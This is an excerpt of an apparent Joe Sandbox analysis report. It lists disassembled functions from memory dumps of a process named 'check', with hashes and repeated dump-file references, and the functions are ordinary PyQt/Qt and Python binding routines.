                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextFrameFormat$setBottomMargin$setBottomMargin(self, amargin: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-2163814367
                                                                                                                                                                                                                                          • Opcode ID: 64376a5654d37f42cdbf2a795e2367e53644ca3ff5af00d29b822d0bab6e3117
                                                                                                                                                                                                                                          • Instruction ID: 922020f64159ef4571cfcbbcdbef5ac2eda4e93bcdb20de55ca561db2b9c008a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64376a5654d37f42cdbf2a795e2367e53644ca3ff5af00d29b822d0bab6e3117
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26210837A08A4AD1DB20CF11E8892A933B4FB94B84F954032DA8E43724EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D98A070 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setFontWeight$setFontWeight(self, weight: int)
                                                                                                                                                                                                                                          • API String ID: 3865857979-3382922237
                                                                                                                                                                                                                                          • Opcode ID: 8837edfb63019293a37ed6c1486ecc3e407133392b1c59ee9fcad12f78ef9f42
                                                                                                                                                                                                                                          • Instruction ID: 9436ab7bfda486848e036ffbddbb6ccca6e418adffde81b3d3379ae857d4f379
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8837edfb63019293a37ed6c1486ecc3e407133392b1c59ee9fcad12f78ef9f42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4721DB36A08A4AD1DB20CF15E8896A933B5FB48BC4F914132DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D993FA0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setFontWordSpacing$setFontWordSpacing(self, spacing: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-1011998758
                                                                                                                                                                                                                                          • Opcode ID: a145a8973ecd7916349f97ad2da27fabe66d3c89dc940e277f96f4bf9d252475
                                                                                                                                                                                                                                          • Instruction ID: 64ac08c3d52ad730fe30e1e934c65f2d2e30ef370b04785ab9b53be1f43d0b8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a145a8973ecd7916349f97ad2da27fabe66d3c89dc940e277f96f4bf9d252475
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621C937A08A4AD1DB208F15E8496A933B4FB44BD4F914032DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D95DFD0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$setBottomPadding$setBottomPadding(self, padding: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-1056005245
                                                                                                                                                                                                                                          • Opcode ID: bc27af2a7ca2ef77cda6ca9c222fa64936b79409bf1b8e011750aaa61cdf996e
                                                                                                                                                                                                                                          • Instruction ID: 786f58922c6a5572c1df37c52780068f2b1d863955b5f9ba057d0048a951d5f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc27af2a7ca2ef77cda6ca9c222fa64936b79409bf1b8e011750aaa61cdf996e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A721C736A08E4AD1DB208F15E8896A933B4FB44BC4F914032DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D98BF20 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setFontOverline$setFontOverline(self, overline: bool)
                                                                                                                                                                                                                                          • API String ID: 3865857979-2878939556
                                                                                                                                                                                                                                          • Opcode ID: b52d3690fe1dd3d4c24b8a662bd3bfe58b14a7997aa839cf364daa0bd3c13195
                                                                                                                                                                                                                                          • Instruction ID: 19279f6a2e339417b563a03b271e13b7178a903c032901af812ab5731bf8329b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b52d3690fe1dd3d4c24b8a662bd3bfe58b14a7997aa839cf364daa0bd3c13195
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F210B36A08B4AD1DB20CF11E8496A933B5FB44B84F954032DA9E43724EF3DE559C704
                                                                                                                                                                                                                                          Function 00007FF89ECA1160 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _PyArg_CheckPositional.PYTHON313 ref: 00007FF89ECA3901
                                                                                                                                                                                                                                          • _PyArg_BadArgument.PYTHON313 ref: 00007FF89ECA3934
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA11C0: PyUnicode_CompareWithASCIIString.PYTHON313 ref: 00007FF89ECA11F2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA11C0: PyUnicode_CompareWithASCIIString.PYTHON313 ref: 00007FF89ECA120A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA11C0: PyType_IsSubtype.PYTHON313 ref: 00007FF89ECA122D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747637090.00007FF89ECA0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECA6000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECEA000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECF8000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748309003.00007FF89ED4A000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748347304.00007FF89ED4C000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
                                                                                                                                                                                                                                          • String ID: argument 1$argument 2$normalize$str
                                                                                                                                                                                                                                          • API String ID: 4101545800-1320425463
                                                                                                                                                                                                                                          • Opcode ID: 85e1f99dde411cb278f0b98270a6e8254a8096954b810f161da5d99ca4afd163
                                                                                                                                                                                                                                          • Instruction ID: ab28b69566d428c976049e6927eab1dc864c1ccd2c71d827f5f954a5c9911642
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85e1f99dde411cb278f0b98270a6e8254a8096954b810f161da5d99ca4afd163
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D911C861B1868690E7B08B15E4C06B92B61EF04FC8F488432EA8D07795DE2CF584C710
                                                                                                                                                                                                                                          Function 00007FF89D99BA10 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?distanceDoubleFloat_FromLine@V1@0@Vector2
                                                                                                                                                                                                                                          • String ID: BJ9J9$QVector2D$distanceToLine$distanceToLine(self, point: QVector2D, direction: QVector2D) -> float
                                                                                                                                                                                                                                          • API String ID: 1543135828-405816686
                                                                                                                                                                                                                                          • Opcode ID: b8127b268a2bbf6dd7300f6d9f691489e5ef914b8f61927b9e049137e4a07284
                                                                                                                                                                                                                                          • Instruction ID: 534f7008cbf50e9d878daab52b93b0ebb994a81cd06d7319ea774a16e746fd65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8127b268a2bbf6dd7300f6d9f691489e5ef914b8f61927b9e049137e4a07284
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C112877A08F46C1DB20CF50E8892AD73A4FB44B90F918136DA9E47320EF39E999C344
                                                                                                                                                                                                                                          Function 00007FF89D96DEA0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?showNormal@RestoreSaveWindow@@
                                                                                                                                                                                                                                          • String ID: QWindow$showNormal$showNormal(self)
                                                                                                                                                                                                                                          • API String ID: 426591181-900794078
                                                                                                                                                                                                                                          • Opcode ID: c5fd94cd696d468a522a48b1a41e003fb38d53b90f0e7a6bdef6da97b9826e45
                                                                                                                                                                                                                                          • Instruction ID: 300b0e599e5de0bec59089c9c600c67ac1a9e991985eccd776b5536caadd90a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5fd94cd696d468a522a48b1a41e003fb38d53b90f0e7a6bdef6da97b9826e45
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A611DA76A08B46C1EB109F51E8896A933A4FB44FD4F955032EA9E03320EF7CE559C744
